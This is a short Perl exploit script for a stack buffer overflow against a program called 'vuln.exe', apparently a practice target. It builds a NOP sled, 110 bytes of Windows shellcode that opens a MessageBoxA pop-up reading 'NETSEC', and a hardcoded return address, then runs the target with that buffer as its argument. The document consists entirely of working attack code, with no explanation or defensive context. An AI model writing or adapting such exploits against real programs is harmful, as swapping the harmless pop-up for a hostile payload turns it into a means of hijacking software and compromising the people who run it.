#!/usr/bin/perl

$nop = "\x90" x 502; #->>> NOP BYTES

####POP-UP SHELLCODE 110BYTE ####

$shellcode = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb".
"\x77\x1d\x80\x7c".  
"\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb".
"\x28\xac\x80\x7c".
"\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x06\x31\xd2\x52\x51".
"\x51\x52\xff\xd0\x31\xd2\x50\xb8\xa2\xca\x81\x7c\xff\xd0\xe8\xc4\xff".
"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff".
"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff".
"\xff\x4e\x45\x54\x53\x45\x43\x4e";


$ret = "\x86\x25\x24\x00";

$buffer = $nop.$shellcode.$ret;

exec("vuln.exe", "$buffer");